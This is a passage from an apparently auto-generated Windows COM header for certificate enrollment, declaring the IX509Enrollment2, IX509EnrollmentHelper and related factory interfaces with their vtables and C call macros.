    MIDL_INTERFACE("728ab350-217d-11da-b2a4-000e7bbb2b09")
    IX509Enrollment2 : public IX509Enrollment
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromTemplate( 
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InstallResponse2( 
            /* [in] */ InstallResponseRestrictionFlags Restrictions,
            /* [in] */ __RPC__in BSTR strResponse,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strPassword,
            /* [in] */ __RPC__in BSTR strEnrollmentPolicyServerUrl,
            /* [in] */ __RPC__in BSTR strEnrollmentPolicyServerID,
            /* [in] */ PolicyServerUrlFlags EnrollmentPolicyServerFlags,
            /* [in] */ X509EnrollmentAuthFlags authFlags) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PolicyServer( 
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Template( 
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RequestIdString( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509Enrollment2Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509Enrollment2 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509Enrollment2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509Enrollment2 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509Enrollment2 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromRequest )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pRequest);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *CreateRequest )( 
            __RPC__in IX509Enrollment2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *Enroll )( 
            __RPC__in IX509Enrollment2 * This);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InstallResponse )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ InstallResponseRestrictionFlags Restrictions,
            /* [in] */ __RPC__in BSTR strResponse,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strPassword);
        
        HRESULT ( STDMETHODCALLTYPE *CreatePFX )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ __RPC__in BSTR strPassword,
            /* [in] */ PFXExportOptions ExportOptions,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Request )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NameValuePairs )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509NameValuePairs **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Status )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentStatus **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Certificate )( 
            __RPC__in IX509Enrollment2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Response )( 
            __RPC__in IX509Enrollment2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_CertificateFriendlyName )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_CertificateFriendlyName )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ __RPC__in BSTR strValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_CertificateDescription )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_CertificateDescription )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ __RPC__in BSTR strValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RequestId )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CAConfigString )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplate )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InstallResponse2 )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ InstallResponseRestrictionFlags Restrictions,
            /* [in] */ __RPC__in BSTR strResponse,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strPassword,
            /* [in] */ __RPC__in BSTR strEnrollmentPolicyServerUrl,
            /* [in] */ __RPC__in BSTR strEnrollmentPolicyServerID,
            /* [in] */ PolicyServerUrlFlags EnrollmentPolicyServerFlags,
            /* [in] */ X509EnrollmentAuthFlags authFlags);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PolicyServer )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Template )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RequestIdString )( 
            __RPC__in IX509Enrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509Enrollment2Vtbl;

    interface IX509Enrollment2
    {
        CONST_VTBL struct IX509Enrollment2Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509Enrollment2_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509Enrollment2_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509Enrollment2_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509Enrollment2_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509Enrollment2_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509Enrollment2_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509Enrollment2_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509Enrollment2_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509Enrollment2_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509Enrollment2_InitializeFromRequest(This,pRequest)	\
    ( (This)->lpVtbl -> InitializeFromRequest(This,pRequest) ) 

#define IX509Enrollment2_CreateRequest(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> CreateRequest(This,Encoding,pValue) ) 

#define IX509Enrollment2_Enroll(This)	\
    ( (This)->lpVtbl -> Enroll(This) ) 

#define IX509Enrollment2_InstallResponse(This,Restrictions,strResponse,Encoding,strPassword)	\
    ( (This)->lpVtbl -> InstallResponse(This,Restrictions,strResponse,Encoding,strPassword) ) 

#define IX509Enrollment2_CreatePFX(This,strPassword,ExportOptions,Encoding,pValue)	\
    ( (This)->lpVtbl -> CreatePFX(This,strPassword,ExportOptions,Encoding,pValue) ) 

#define IX509Enrollment2_get_Request(This,pValue)	\
    ( (This)->lpVtbl -> get_Request(This,pValue) ) 

#define IX509Enrollment2_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509Enrollment2_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509Enrollment2_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509Enrollment2_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509Enrollment2_get_NameValuePairs(This,ppValue)	\
    ( (This)->lpVtbl -> get_NameValuePairs(This,ppValue) ) 

#define IX509Enrollment2_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509Enrollment2_get_Status(This,ppValue)	\
    ( (This)->lpVtbl -> get_Status(This,ppValue) ) 

#define IX509Enrollment2_get_Certificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Certificate(This,Encoding,pValue) ) 

#define IX509Enrollment2_get_Response(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Response(This,Encoding,pValue) ) 

#define IX509Enrollment2_get_CertificateFriendlyName(This,pValue)	\
    ( (This)->lpVtbl -> get_CertificateFriendlyName(This,pValue) ) 

#define IX509Enrollment2_put_CertificateFriendlyName(This,strValue)	\
    ( (This)->lpVtbl -> put_CertificateFriendlyName(This,strValue) ) 

#define IX509Enrollment2_get_CertificateDescription(This,pValue)	\
    ( (This)->lpVtbl -> get_CertificateDescription(This,pValue) ) 

#define IX509Enrollment2_put_CertificateDescription(This,strValue)	\
    ( (This)->lpVtbl -> put_CertificateDescription(This,strValue) ) 

#define IX509Enrollment2_get_RequestId(This,pValue)	\
    ( (This)->lpVtbl -> get_RequestId(This,pValue) ) 

#define IX509Enrollment2_get_CAConfigString(This,pValue)	\
    ( (This)->lpVtbl -> get_CAConfigString(This,pValue) ) 


#define IX509Enrollment2_InitializeFromTemplate(This,context,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromTemplate(This,context,pPolicyServer,pTemplate) ) 

#define IX509Enrollment2_InstallResponse2(This,Restrictions,strResponse,Encoding,strPassword,strEnrollmentPolicyServerUrl,strEnrollmentPolicyServerID,EnrollmentPolicyServerFlags,authFlags)	\
    ( (This)->lpVtbl -> InstallResponse2(This,Restrictions,strResponse,Encoding,strPassword,strEnrollmentPolicyServerUrl,strEnrollmentPolicyServerID,EnrollmentPolicyServerFlags,authFlags) ) 

#define IX509Enrollment2_get_PolicyServer(This,ppPolicyServer)	\
    ( (This)->lpVtbl -> get_PolicyServer(This,ppPolicyServer) ) 

#define IX509Enrollment2_get_Template(This,ppTemplate)	\
    ( (This)->lpVtbl -> get_Template(This,ppTemplate) ) 

#define IX509Enrollment2_get_RequestIdString(This,pValue)	\
    ( (This)->lpVtbl -> get_RequestIdString(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509Enrollment2_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0088 */
/* [local] */ 

typedef 
enum WebEnrollmentFlags
    {
        EnrollPrompt	= 0x1
    } 	WebEnrollmentFlags;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0088_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0088_v0_0_s_ifspec;

#ifndef __IX509EnrollmentHelper_INTERFACE_DEFINED__
#define __IX509EnrollmentHelper_INTERFACE_DEFINED__

/* interface IX509EnrollmentHelper */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509EnrollmentHelper;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab351-217d-11da-b2a4-000e7bbb2b09")
    IX509EnrollmentHelper : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE AddPolicyServer( 
            /* [in] */ __RPC__in BSTR strEnrollmentPolicyServerURI,
            /* [in] */ __RPC__in BSTR strEnrollmentPolicyID,
            /* [in] */ PolicyServerUrlFlags EnrollmentPolicyServerFlags,
            /* [in] */ X509EnrollmentAuthFlags authFlags,
            /* [in] */ __RPC__in BSTR strCredential,
            /* [in] */ __RPC__in BSTR strPassword) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE AddEnrollmentServer( 
            /* [in] */ __RPC__in BSTR strEnrollmentServerURI,
            /* [in] */ X509EnrollmentAuthFlags authFlags,
            /* [in] */ __RPC__in BSTR strCredential,
            /* [in] */ __RPC__in BSTR strPassword) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE Enroll( 
            /* [in] */ __RPC__in BSTR strEnrollmentPolicyServerURI,
            /* [in] */ __RPC__in BSTR strTemplateName,
            /* [in] */ EncodingType Encoding,
            /* [in] */ WebEnrollmentFlags enrollFlags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrCertificate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ X509CertificateEnrollmentContext Context) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509EnrollmentHelperVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509EnrollmentHelper * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509EnrollmentHelper * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509EnrollmentHelper * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509EnrollmentHelper * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509EnrollmentHelper * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509EnrollmentHelper * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509EnrollmentHelper * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *AddPolicyServer )( 
            __RPC__in IX509EnrollmentHelper * This,
            /* [in] */ __RPC__in BSTR strEnrollmentPolicyServerURI,
            /* [in] */ __RPC__in BSTR strEnrollmentPolicyID,
            /* [in] */ PolicyServerUrlFlags EnrollmentPolicyServerFlags,
            /* [in] */ X509EnrollmentAuthFlags authFlags,
            /* [in] */ __RPC__in BSTR strCredential,
            /* [in] */ __RPC__in BSTR strPassword);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *AddEnrollmentServer )( 
            __RPC__in IX509EnrollmentHelper * This,
            /* [in] */ __RPC__in BSTR strEnrollmentServerURI,
            /* [in] */ X509EnrollmentAuthFlags authFlags,
            /* [in] */ __RPC__in BSTR strCredential,
            /* [in] */ __RPC__in BSTR strPassword);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Enroll )( 
            __RPC__in IX509EnrollmentHelper * This,
            /* [in] */ __RPC__in BSTR strEnrollmentPolicyServerURI,
            /* [in] */ __RPC__in BSTR strTemplateName,
            /* [in] */ EncodingType Encoding,
            /* [in] */ WebEnrollmentFlags enrollFlags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509EnrollmentHelper * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        END_INTERFACE
    } IX509EnrollmentHelperVtbl;

    interface IX509EnrollmentHelper
    {
        CONST_VTBL struct IX509EnrollmentHelperVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509EnrollmentHelper_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509EnrollmentHelper_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509EnrollmentHelper_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509EnrollmentHelper_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509EnrollmentHelper_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509EnrollmentHelper_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509EnrollmentHelper_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509EnrollmentHelper_AddPolicyServer(This,strEnrollmentPolicyServerURI,strEnrollmentPolicyID,EnrollmentPolicyServerFlags,authFlags,strCredential,strPassword)	\
    ( (This)->lpVtbl -> AddPolicyServer(This,strEnrollmentPolicyServerURI,strEnrollmentPolicyID,EnrollmentPolicyServerFlags,authFlags,strCredential,strPassword) ) 

#define IX509EnrollmentHelper_AddEnrollmentServer(This,strEnrollmentServerURI,authFlags,strCredential,strPassword)	\
    ( (This)->lpVtbl -> AddEnrollmentServer(This,strEnrollmentServerURI,authFlags,strCredential,strPassword) ) 

#define IX509EnrollmentHelper_Enroll(This,strEnrollmentPolicyServerURI,strTemplateName,Encoding,enrollFlags,pstrCertificate)	\
    ( (This)->lpVtbl -> Enroll(This,strEnrollmentPolicyServerURI,strTemplateName,Encoding,enrollFlags,pstrCertificate) ) 

#define IX509EnrollmentHelper_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509EnrollmentHelper_INTERFACE_DEFINED__ */


#ifndef __IX509EnrollmentWebClassFactory_INTERFACE_DEFINED__
#define __IX509EnrollmentWebClassFactory_INTERFACE_DEFINED__

/* interface IX509EnrollmentWebClassFactory */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509EnrollmentWebClassFactory;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab349-217d-11da-b2a4-000e7bbb2b09")
    IX509EnrollmentWebClassFactory : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE CreateObject( 
            /* [in] */ __RPC__in BSTR strProgID,
            /* [retval][out] */ __RPC__deref_out_opt IUnknown **ppIUnknown) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509EnrollmentWebClassFactoryVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509EnrollmentWebClassFactory * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509EnrollmentWebClassFactory * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509EnrollmentWebClassFactory * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509EnrollmentWebClassFactory * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509EnrollmentWebClassFactory * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509EnrollmentWebClassFactory * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509EnrollmentWebClassFactory * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *CreateObject )( 
            __RPC__in IX509EnrollmentWebClassFactory * This,
            /* [in] */ __RPC__in BSTR strProgID,
            /* [retval][out] */ __RPC__deref_out_opt IUnknown **ppIUnknown);
        
        END_INTERFACE
    } IX509EnrollmentWebClassFactoryVtbl;

    interface IX509EnrollmentWebClassFactory
    {
        CONST_VTBL struct IX509EnrollmentWebClassFactoryVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509EnrollmentWebClassFactory_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509EnrollmentWebClassFactory_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509EnrollmentWebClassFactory_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509EnrollmentWebClassFactory_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509EnrollmentWebClassFactory_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509EnrollmentWebClassFactory_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509EnrollmentWebClassFactory_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509EnrollmentWebClassFactory_CreateObject(This,strProgID,ppIUnknown)	\
    ( (This)->lpVtbl -> CreateObject(This,strProgID,ppIUnknown) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509EnrollmentWebClassFactory_INTERFACE_DEFINED__ */


#ifndef __IX509MachineEnrollmentFactory_INTERFACE_DEFINED__
#define __IX509MachineEnrollmentFactory_INTERFACE_DEFINED__

/* interface IX509MachineEnrollmentFactory */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509MachineEnrollmentFactory;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab352-217d-11da-b2a4-000e7bbb2b09")
    IX509MachineEnrollmentFactory : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE CreateObject( 
            /* [in] */ __RPC__in BSTR strProgID,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentHelper **ppIHelper) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509MachineEnrollmentFactoryVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509MachineEnrollmentFactory * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509MachineEnrollmentFactory * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509MachineEnrollmentFactory * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509MachineEnrollmentFactory * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509MachineEnrollmentFactory * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
